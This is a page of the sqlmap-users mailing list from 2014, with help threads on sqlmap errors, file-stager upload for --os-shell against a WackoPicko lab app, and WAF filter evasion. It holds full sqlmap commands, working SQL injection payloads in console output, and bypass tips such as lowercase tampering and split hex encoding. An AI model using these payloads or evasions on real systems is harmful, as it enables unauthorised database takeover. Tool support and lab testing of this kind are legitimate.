sqlmap-users Mailing List for sqlmap (Page 20)
From: Miroslav S. <mir...@gm...> - 2014-08-16 12:26:55
--tamper=lowercase

Bye

On Fri, Aug 15, 2014 at 2:51 PM, Brandon Perry <bpe...@gm...> wrote:

> Could you use the --eval on the param that is injectable and replace FROM with from?
>
> On Fri, Aug 15, 2014 at 1:20 AM, Michael Bachmann <mba...@gm...> wrote:
>
>> Hi Community
>>
>> I got a special case where I need to change the upper-case "FROM" to the lower-case "from" in the payload to evade the filter. So I thought I can change all occurrences in queries.xml to get the correct result. But in the http-requests it stays upper-case. Can someone please point me in the right direction to get my problem solved? Thanks for your help.
>>
>> Best regards
>> Michael
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2014-08-15 15:02:19
Can you write to /tmp?

Pick a directory you KNOW you should be able to write to, and ensure you can write to that first.

Also, maybe SELinux/AppArmor are getting in the way.

On Fri, Aug 15, 2014 at 9:52 AM, Omara <col...@ho...> wrote:

> Brandon Perry <bperry.volatile@...> writes:
>
> > Can you write to /tmp?
> > Instead of chowning the directory, just chmod -R 777 the dir you want to write the payload to, that's how many docs on the internet tell people to make an upload directory, for instance, writable by the web server.
> >
> > Of course, this is incorrect, but it's definitely easier than figuring out what your permissions really should be.
> >
> > On Thu, Aug 14, 2014 at 10:34 PM, M Omara <coldhand-Pkb...@pu...> wrote:
> > Brandon Perry <bperry.volatile <at> ...> writes:
> > > > Does the mysql user have write permissions on the web server? A properly configured web server where chown www-data:www-data was done, as opposed to chmod 777 on the web dir, which is an improper configuration, will not allow the mysql user to write to the web root.
> > You are right, the /var/www has www-data:www-data set. So I created a temp folder inside the web root with nobody:nogroup permission but I am still getting the same error. Any more configurations I need to change in mysql db for this to work. Thank you in advance.
>
> I should be able to write to /var/www/WackoPicko/temp but I still get the same 404 error. I also give chmod 777 -R to /var/www/WackoPicko/users to no avail. Do I need to use different switches to be able to write to the web root? I added the --file-dest write switch but still not working. The man page says --os-shell works only with writable web root directory and I created one but it doesn't work. However, I can get SQL shell on the database.
>
> sqlmap -u "http://x.x.x.x/WackoPicko/users/login.php" --data "username=hacker&password=password&submit=login" --os-shell -v 1 --flush-session --file-dest=http://x.x.x.x/WackoPicko/users

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Omara <col...@ho...> - 2014-08-15 14:53:05
Brandon Perry <bperry.volatile@...> writes:

> Can you write to /tmp?
> Instead of chowning the directory, just chmod -R 777 the dir you want to write the payload to, that's how many docs on the internet tell people to make an upload directory, for instance, writable by the web server.
>
> Of course, this is incorrect, but it's definitely easier than figuring out what your permissions really should be.
>
> On Thu, Aug 14, 2014 at 10:34 PM, M Omara <coldhand-Pkb...@pu...> wrote:
> Brandon Perry <bperry.volatile <at> ...> writes:
> > > Does the mysql user have write permissions on the web server? A properly configured web server where chown www-data:www-data was done, as opposed to chmod 777 on the web dir, which is an improper configuration, will not allow the mysql user to write to the web root.
> You are right, the /var/www has www-data:www-data set. So I created a temp folder inside the web root with nobody:nogroup permission but I am still getting the same error. Any more configurations I need to change in mysql db for this to work. Thank you in advance.

I should be able to write to /var/www/WackoPicko/temp but I still get the same 404 error. I also give chmod 777 -R to /var/www/WackoPicko/users to no avail. Do I need to use different switches to be able to write to the web root? I added the --file-dest write switch but still not working. The man page says --os-shell works only with writable web root directory and I created one but it doesn't work. However, I can get SQL shell on the database.

sqlmap -u "http://x.x.x.x/WackoPicko/users/login.php" --data "username=hacker&password=password&submit=login" --os-shell -v 1 --flush-session --file-dest=http://x.x.x.x/WackoPicko/users
From: Brandon P. <bpe...@gm...> - 2014-08-15 13:13:34
Can you write to /tmp?

Instead of chowning the directory, just chmod -R 777 the dir you want to write the payload to, that's how many docs on the internet tell people to make an upload directory, for instance, writable by the web server.

Of course, this is incorrect, but it's definitely easier than figuring out what your permissions really should be.

On Thu, Aug 14, 2014 at 10:34 PM, M Omara <col...@ho...> wrote:

> Brandon Perry <bperry.volatile@...> writes:
>
> > Does the mysql user have write permissions on the web server? A properly configured web server where chown www-data:www-data was done, as opposed to chmod 777 on the web dir, which is an improper configuration, will not allow the mysql user to write to the web root.
>
> You are right, the /var/www has www-data:www-data set. So I created a temp folder inside the web root with nobody:nogroup permission but I am still getting the same error. Any more configurations I need to change in mysql db for this to work. Thank you in advance.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2014-08-15 12:51:07
Could you use the --eval on the param that is injectable and replace FROM with from?

On Fri, Aug 15, 2014 at 1:20 AM, Michael Bachmann <mba...@gm...> wrote:

> Hi Community
>
> I got a special case where I need to change the upper-case "FROM" to the lower-case "from" in the payload to evade the filter. So I thought I can change all occurrences in queries.xml to get the correct result. But in the http-requests it stays upper-case. Can someone please point me in the right direction to get my problem solved? Thanks for your help.
>
> Best regards
> Michael

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Michael B. <mba...@gm...> - 2014-08-15 06:20:23
Hi Community

I got a special case where I need to change the upper-case "FROM" to the lower-case "from" in the payload to evade the filter. So I thought I can change all occurrences in queries.xml to get the correct result. But in the http-requests it stays upper-case. Can someone please point me in the right direction to get my problem solved? Thanks for your help.

Best regards
Michael
From: M O. <col...@ho...> - 2014-08-15 03:34:49
Brandon Perry <bperry.volatile@...> writes:

> Does the mysql user have write permissions on the web server? A properly configured web server where chown www-data:www-data was done, as opposed to chmod 777 on the web dir, which is an improper configuration, will not allow the mysql user to write to the web root.

You are right, the /var/www has www-data:www-data set. So I created a temp folder inside the web root with nobody:nogroup permission but I am still getting the same error. Any more configurations I need to change in mysql db for this to work. Thank you in advance.
From: Brandon P. <bpe...@gm...> - 2014-08-14 16:56:19
Does the mysql user have write permissions on the web server? A properly configured web server where chown www-data:www-data was done, as opposed to chmod 777 on the web dir, which is an improper configuration, will not allow the mysql user to write to the web root.

On Wed, Aug 13, 2014 at 6:47 PM, M Omara <col...@ho...> wrote:

> I can't get to upload the stager file on the OWASPbwa document root (/var/wwww/WackoPicko/users). I am not sure how to troubleshoot this issue. Any help on the issue will be appreciated. Thank you.
>
> root@kali:~# sqlmap -u "http://192.168.0.8/WackoPicko/users/login.php" --data "username=hacker&password=password&submit=login" --os-shell -v 1 --flush-session
>
> sqlmap/1.0-dev - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 11:22:25
>
> [11:22:25] [INFO] testing connection to the target url
> [11:22:25] [INFO] heuristics detected web page charset 'None'
> sqlmap got a 303 redirect to 'http://192.168.0.8:80/WackoPicko/users/home.php'. Do you want to follow? [Y/n] Y
> redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n
> [11:22:32] [INFO] heuristics detected web page charset 'ascii'
> [11:22:32] [INFO] testing if the url is stable, wait a few seconds
> [11:22:33] [WARNING] POST parameter 'username' does not appear dynamic
> [11:22:33] [WARNING] heuristic (parsing) test shows that POST parameter 'username' might not be injectable
> [11:22:33] [INFO] testing for SQL injection on POST parameter 'username'
> [11:22:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [11:22:33] [WARNING] reflective value(s) found and filtering out
> [11:22:33] [INFO] POST parameter 'username' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> [11:22:34] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
> do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] n
> [11:22:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
> [11:22:45] [INFO] POST parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
> [11:22:45] [INFO] testing 'MySQL inline queries'
> [11:22:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [11:22:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [11:22:55] [INFO] POST parameter 'username' is 'MySQL > 5.0.11 AND time-based blind' injectable
> [11:22:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
> [11:22:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
> [11:22:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
> [11:22:56] [INFO] target url appears to have 9 columns in query
> injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
> [11:23:01] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
> [11:23:01] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
> POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 81 HTTP(s) requests:
> ---
> Place: POST
> Parameter: username
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: username=hacker' AND 3230=3230 AND 'YAZW'='YAZW&password=password&submit=login
>
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>     Payload: username=hacker' AND (SELECT 1330 FROM(SELECT COUNT(*),CONCAT(0x3a70636d3a,(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0 END)),0x3a7364723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Dris'='Dris&password=password&submit=login
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: username=hacker' AND SLEEP(5) AND 'kgtY'='kgtY&password=password&submit=login
> ---
> [11:23:05] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
> web application technology: PHP 5.3.2, Apache 2.2.14
> back-end DBMS: MySQL 5.0
> [11:23:05] [INFO] going to use a web backdoor for command prompt
> [11:23:05] [INFO] fingerprinting the back-end DBMS operating system
> [11:23:05] [INFO] the back-end DBMS operating system is Linux
> [11:23:05] [INFO] trying to upload the file stager
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] JSP
> [4] PHP (default)
> |> 4
> [11:23:08] [WARNING] unable to retrieve automatically the web server document root
> do you want to provide a text file with a list of directories to try? [y/N] N
> please provide the web server document root [/var/www/]: /var/www/WackoPicko/users
> [11:23:26] [WARNING] unable to retrieve automatically any web server path
> please provide additional comma separated file paths to try to upload the agent inside the possible document:
> [11:23:32] [WARNING] unable to upload the file stager on '/var/www/WackoPicko/users'
> [11:23:32] [WARNING] unable to upload the file stager on '/var/www/WackoPicko/users/WackoPicko/users'
> [11:23:32] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 2 times
> [11:23:32] [INFO] fetched data logged to text files under './output/192.168.0.8'
>
> [*] shutting down at 11:23:32

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
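A check a server owner could run for the configuration point made in the message above (chown www-data:www-data versus chmod 777), added here as an example that is not part of the thread or of sqlmap. It lists every directory under a web root in which a given account, for instance the database service account, could create files; the function names are hypothetical, and only classic UNIX mode bits are evaluated (no ACLs, SELinux or AppArmor).

```python
import os
import stat
import sys


def can_create_in(st, uid, gids):
    """Return True if the account (uid, gids) may create files in a directory
    whose os.stat_result is `st`. Creating an entry needs write AND search (x)
    permission on the directory, taken from the one permission class that
    applies: owner, else group, else other."""
    if uid == 0:
        return True  # root bypasses mode bits
    if st.st_uid == uid:
        shift = 0    # owner bits
    elif st.st_gid in gids:
        shift = 3    # group bits
    else:
        shift = 6    # other bits
    write_bit = stat.S_IWUSR >> shift
    search_bit = stat.S_IXUSR >> shift
    return bool(st.st_mode & write_bit) and bool(st.st_mode & search_bit)


def audit_web_root(root, uid, gids):
    """Walk `root` and return sorted (path, mode, reason) tuples for every
    directory the account could write into. Symlinked directories are not
    followed (os.walk default)."""
    findings = []
    for dirpath, _dirnames, _filenames in os.walk(root):
        st = os.lstat(dirpath)
        if not can_create_in(st, uid, gids):
            continue
        if st.st_mode & stat.S_IWOTH:
            reason = "world-writable"
        elif st.st_uid == uid:
            reason = "owned by account"
        else:
            reason = "group-writable for account"
        findings.append((dirpath, oct(stat.S_IMODE(st.st_mode)), reason))
    return sorted(findings)


if __name__ == "__main__":
    # Usage (assumed invocation): python3 audit.py /var/www mysql
    import pwd  # POSIX only

    web_root, account = sys.argv[1], sys.argv[2]
    entry = pwd.getpwnam(account)
    groups = set(os.getgrouplist(account, entry.pw_gid))
    for path, mode, reason in audit_web_root(web_root, entry.pw_uid, groups):
        print(f"{mode}  {path}  ({reason})")
```

An empty result for the database account means file writes issued through the DBMS cannot land in a web-served directory by way of mode bits alone.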
From: M O. <col...@ho...> - 2014-08-14 00:40:20
I can't get to upload the stager file on the OWASPbwa document root (/var/wwww/WackoPicko/users). I am not sure how to troubleshoot this issue. Any help on the issue will be appreciated. Thank you.

root@kali:~# sqlmap -u "http://192.168.0.8/WackoPicko/users/login.php" --data "username=hacker&password=password&submit=login" --os-shell -v 1 --flush-session

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:22:25

[11:22:25] [INFO] testing connection to the target url
[11:22:25] [INFO] heuristics detected web page charset 'None'
sqlmap got a 303 redirect to 'http://192.168.0.8:80/WackoPicko/users/home.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n
[11:22:32] [INFO] heuristics detected web page charset 'ascii'
[11:22:32] [INFO] testing if the url is stable, wait a few seconds
[11:22:33] [WARNING] POST parameter 'username' does not appear dynamic
[11:22:33] [WARNING] heuristic (parsing) test shows that POST parameter 'username' might not be injectable
[11:22:33] [INFO] testing for SQL injection on POST parameter 'username'
[11:22:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:22:33] [WARNING] reflective value(s) found and filtering out
[11:22:33] [INFO] POST parameter 'username' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:22:34] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] n
[11:22:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:22:45] [INFO] POST parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[11:22:45] [INFO] testing 'MySQL inline queries'
[11:22:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:22:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:22:55] [INFO] POST parameter 'username' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:22:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:22:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[11:22:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:22:56] [INFO] target url appears to have 9 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[11:23:01] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[11:23:01] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 81 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=hacker' AND 3230=3230 AND 'YAZW'='YAZW&password=password&submit=login

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=hacker' AND (SELECT 1330 FROM(SELECT COUNT(*),CONCAT(0x3a70636d3a,(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0 END)),0x3a7364723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Dris'='Dris&password=password&submit=login

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=hacker' AND SLEEP(5) AND 'kgtY'='kgtY&password=password&submit=login
---
[11:23:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:23:05] [INFO] going to use a web backdoor for command prompt
[11:23:05] [INFO] fingerprinting the back-end DBMS operating system
[11:23:05] [INFO] the back-end DBMS operating system is Linux
[11:23:05] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
|> 4
[11:23:08] [WARNING] unable to retrieve automatically the web server document root
do you want to provide a text file with a list of directories to try? [y/N] N
please provide the web server document root [/var/www/]: /var/www/WackoPicko/users
[11:23:26] [WARNING] unable to retrieve automatically any web server path
please provide additional comma separated file paths to try to upload the agent inside the possible document:
[11:23:32] [WARNING] unable to upload the file stager on '/var/www/WackoPicko/users'
[11:23:32] [WARNING] unable to upload the file stager on '/var/www/WackoPicko/users/WackoPicko/users'
[11:23:32] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[11:23:32] [INFO] fetched data logged to text files under './output/192.168.0.8'

[*] shutting down at 11:23:32
From: Brandon P. <bpe...@gm...> - 2014-08-10 21:39:16
I am not sure if sqlmap is capable of this, but I have found inserting the filtered character in the middle of its hex-encoded counterpart (in your case %2.E for instance) can bypass similar filters. This only works if the param is url-decoded after the filter is performed on the string.

On Sun, Aug 10, 2014 at 3:57 PM, <du...@al...> wrote:

> So I did a little test on my site where I simply filtered out "." (period) in incoming GET parameters that were vulnerable to SQLi. sqlmap then failed to list databases, tables and columns. Since INFORMATION_SCHEMA.TABLES would become INFORMATION_SCHEMATABLES and fail with a "Table testdb.INFORMATION_SCHEMATABLES doesn't exist".
> Can sqlmap bypass this somehow? I have played around with tamper a bit, but haven't bypassed it yet (haven't tried all tamper scripts though, only some that sounded logical to try).
>
> Note: I don't see this as a means to protect my sites in the future. It's just a little late Sunday night sqlmap fun :)
>
> Cheers!

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
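The two filters discussed on this page (the "." stripping above and the upper-case "FROM" check in the 2014-08-15 thread) next to parameter handling that does not depend on character filtering, as an added example that is not from the thread or from sqlmap. The table, its rows and all function names are constructed for illustration, and sqlite3 stands in for the site's database.

```python
import re
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed sample database standing in for the application's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?)",
        [(1, "alpha"), (7, "Report.FROM.2014"), (42, "beta")],
    )
    return conn


# --- The weak 'before': filters as described in the threads ---------------

def strip_period_then_decode(raw):
    """Strip '.' from the raw parameter, URL-decode afterwards.
    The check runs on a different string than the one the query receives."""
    return unquote(raw.replace(".", ""))


def contains_upper_from(raw):
    """Case-sensitive keyword check: only the exact spelling 'FROM' matches,
    while SQL keywords are case-insensitive."""
    return "FROM" in raw


# --- The 'after': decode once, allow-list, bind ---------------------------

ID_PATTERN = re.compile(r"[0-9]{1,9}")  # assumed: the parameter is a numeric id


def parse_id(raw):
    """Decode first, then validate the decoded value. Anything left over that
    is not a digit (including a stray '%') is rejected, not repaired."""
    value = unquote(raw)
    if not ID_PATTERN.fullmatch(value):
        raise ValueError("id must be 1-9 decimal digits")
    return int(value)


def get_name(conn, raw_id):
    """Numeric parameter: validated, then passed as a bound value."""
    row = conn.execute(
        "SELECT name FROM items WHERE id = ?", (parse_id(raw_id),)
    ).fetchone()
    return row[0] if row else None


def search_name(conn, raw_name):
    """Free-text parameter: no character filtering; the decoded value is bound,
    so '.', quotes and SQL keywords in it are only ever compared as data."""
    rows = conn.execute(
        "SELECT id FROM items WHERE name = ? ORDER BY id", (unquote(raw_name),)
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    # The value from the thread: the filter removes the '.', decoding restores one.
    print(strip_period_then_decode("INFORMATION_SCHEMA%2.ETABLES"))
    # The same filters damage or reject a legitimate value.
    print(strip_period_then_decode("Report.FROM.2014"), contains_upper_from("Report.FROM.2014"))
    # Bound parameters handle both cases without any blacklist.
    print(search_name(db, "Report.FROM.2014"), search_name(db, "INFORMATION_SCHEMA%2.ETABLES"))
    print(get_name(db, "%34%32"))
```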
From: <du...@al...> - 2014-08-10 21:16:01
So I did a little test on my site where I simply filtered out "." (period) in incoming GET parameters that were vulnerable to SQLi. sqlmap then failed to list databases, tables and columns. Since INFORMATION_SCHEMA.TABLES would become INFORMATION_SCHEMATABLES and fail with a "Table testdb.INFORMATION_SCHEMATABLES doesn't exist".

Can sqlmap bypass this somehow? I have played around with tamper a bit, but haven't bypassed it yet (haven't tried all tamper scripts though, only some that sounded logical to try).

Note: I don't see this as a means to protect my sites in the future. It's just a little late Sunday night sqlmap fun :)

Cheers!
From: Miroslav S. <mir...@gm...> - 2014-08-06 07:21:05
Hi.

It looks like you are using option --charset (but in the wrong way). It looks like you've used --charset http://www.sukipara.net/shop/shop.php?idA7, which is the wrong way to use it.

Bye

On Thu, Jul 31, 2014 at 8:11 PM, <whi...@ma...> wrote:

> UNKOWN charset
>
> http://www.sukipara.net/shop/shop.php?idA7

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2014-08-03 13:14:21
Looks like a permissions issue on the filesystem, not an issue with sqlmap, no?

OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'

On Sun, Aug 3, 2014 at 5:51 AM, Santhosh Kumar <sk8...@gm...> wrote:

> pls help me to solve this problem....unhandled exception in sqlmap
>
> Santhosh Kumar <sk8...@gm...> Sun, Aug 3, 2014 at 4:12 PM
> To: sql...@li...
>
> The error shows as:
>
> [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u ****************************************** -D ****** -T *********** -C ********** --dump
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap", line 95, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 361, in start
>     setupTargetEnv()
>   File "/usr/share/sqlmap/lib/core/target.py", line 565, in setupTargetEnv
>     _createTargetDirs()
>   File "/usr/share/sqlmap/lib/core/target.py", line 521, in _createTargetDirs
>     _createDumpDir()
>   File "/usr/share/sqlmap/lib/core/target.py", line 465, in _createDumpDir
>     os.makedirs(conf.dumpPath, 0755)
>   File "/usr/lib/python2.7/os.py", line 150, in makedirs
>     makedirs(head, mode)
>   File "/usr/lib/python2.7/os.py", line 150, in makedirs
>     makedirs(head, mode)
>   File "/usr/lib/python2.7/os.py", line 157, in makedirs
>     mkdir(name, mode)
> OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'
>
> [*] shutting down at 16:08:23
>
> Pls kindly help me....
> Thank you

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Santhosh K. <sk8...@gm...> - 2014-08-03 10:52:04
pls help me to solve this problem....unhandled exception in sqlmap

Santhosh Kumar <sk8...@gm...> Sun, Aug 3, 2014 at 4:12 PM
To: sql...@li...

The error shows as:

[CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u ****************************************** -D ****** -T *********** -C ********** --dump
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap", line 95, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 361, in start
    setupTargetEnv()
  File "/usr/share/sqlmap/lib/core/target.py", line 565, in setupTargetEnv
    _createTargetDirs()
  File "/usr/share/sqlmap/lib/core/target.py", line 521, in _createTargetDirs
    _createDumpDir()
  File "/usr/share/sqlmap/lib/core/target.py", line 465, in _createDumpDir
    os.makedirs(conf.dumpPath, 0755)
  File "/usr/lib/python2.7/os.py", line 150, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.7/os.py", line 150, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.7/os.py", line 157, in makedirs
    mkdir(name, mode)
OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'

[*] shutting down at 16:08:23

Pls kindly help me....
Thank you
From: Santhosh K. <sk8...@gm...> - 2014-08-03 10:42:18
|
The error shows as:

[CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u ****************************************** -D ****** -T *********** -C ********** --dump
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap", line 95, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 361, in start
    setupTargetEnv()
  File "/usr/share/sqlmap/lib/core/target.py", line 565, in setupTargetEnv
    _createTargetDirs()
  File "/usr/share/sqlmap/lib/core/target.py", line 521, in _createTargetDirs
    _createDumpDir()
  File "/usr/share/sqlmap/lib/core/target.py", line 465, in _createDumpDir
    os.makedirs(conf.dumpPath, 0755)
  File "/usr/lib/python2.7/os.py", line 150, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.7/os.py", line 150, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.7/os.py", line 157, in makedirs
    mkdir(name, mode)
OSError: [Errno 13] Permission denied: '/usr/share/sqlmap/output'

[*] shutting down at 16:08:23

Pls kindly help me....
Thank you
|
From: <whi...@ma...> - 2014-07-31 19:03:01
|
http://www.sukipara.net/shop/shop.php?id=417 |
From: Brandon P. <bpe...@gm...> - 2014-07-22 12:58:51
|
There is a root MySQL user that is disparate from the root system user.

On Tue, Jul 22, 2014 at 4:53 AM, Sharma, Vivek <viv...@bl...> wrote:
> Hi All,
>
> While trying out the sql shell option, I saw that sql-map spawns a
> sql-shell for me, great!
>
> The vulnerable application was running on a low privileged account, not
> root@localhost. But when I did
>
> sql-shell>select user()
>
> It tells me the user is *root@localhost*.
>
> Is it that sql-map opens up a shell with a root account, irrespective of
> the account application is running on. Seems unrealistic though.
>
> If not what could be the possible reason?
>
> Regards
>
> Vivek Sharma

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
From: Sharma, V. <viv...@bl...> - 2014-07-22 09:54:02
|
Hi All,

While trying out the sql shell option, I saw that sql-map spawns a sql-shell for me, great!

The vulnerable application was running on a low privileged account, not root@localhost. But when I did

sql-shell>select user()

It tells me the user is root@localhost.

Is it that sql-map opens up a shell with a root account, irrespective of the account application is running on. Seems unrealistic though.

If not what could be the possible reason?

Regards
Vivek Sharma
|
From: Miroslav S. <mir...@gm...> - 2014-07-16 06:21:10
|
IMO, problem with immediate table dump after a timeout could be that the average user would falsely think that everything went ok. I would really suggest you to find out why all of a sudden there are timeouts.

Bye
|
From: Dirk W. <sp...@dr...> - 2014-07-15 10:42:49
|
Hi Miroslav,

On 07/14/2014 08:56 PM, Miroslav Stampar wrote:
> Hi Dirk.
>
> sqlmap doesn't retrieve already retrieved data. It stores them into the local session data for later (re)usage.

I thought so too. But when for some reason the network times out or any other special circumstances occur it would be great if sqlmap would just dump immediately what it retrieved so far. I started it again afterwards, hoping after ^C it would dump the whole data then but it dumped 1-2 lines only.

> "boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data" -> I would expect your problem in union SQLI, but not boolean-based blind.

nope, definitely it's a boolean based blind and at the same time (same variable) a time-based blind vulnerability I am exploiting. During this run I left sqlmap the choice which one to exploit. Previously I thought I restricted it to use --technique=B .

> Please make sure that:
> 1) you are running the latest revision from our Github repository

check (ok, from last week)

> 2) that target is not having some kind of WAF protection mechanism that does the hard drop of requests

check (definitely network issue). But I didn't run wireshark or so, so I can't tell whether a TCP RST was sent from a party in between.

> As said, I don't see a reason why would sqlmap fail here. It would be great if you could isolate "problematic" payload with usage of -v 3 and try it inside the browser (to see what's happening)

Miroslav, I can only report what I observed :-) Data retrieval on this special table was running for ~3 days. I retrieved numerous other tables the week before (exactly the same vulnerability) and I am really certain the original cause of the hiccup was just a network outage.

The last famous words before bail out were:

[09:54:15] [INFO] retrieving the length of query output
[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>51 AND (7548=7548
